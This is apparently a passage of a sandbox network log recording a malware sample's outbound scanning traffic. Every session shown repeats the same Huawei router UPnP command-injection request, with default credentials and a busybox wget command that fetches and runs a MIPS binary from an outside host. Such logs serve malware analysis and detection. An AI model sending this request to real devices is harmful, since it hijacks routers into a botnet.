69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  838192.168.2.1338906197.121.224.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374500990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  839192.168.2.136097641.151.73.10937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374500990 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  840192.168.2.1340118197.4.235.1137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374511003 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  841192.168.2.133455441.197.205.19037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374516010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  842192.168.2.1342968157.88.0.4937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374526024 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  843192.168.2.133790827.213.40.24737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374564886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  844192.168.2.134582841.251.181.637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374564886 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  845192.168.2.1337522157.232.225.16437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374635935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  846192.168.2.1338820157.39.151.12137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374651909 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  847192.168.2.1350712167.136.52.21237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374659061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  848192.168.2.1336104197.64.172.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:58.374670982 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
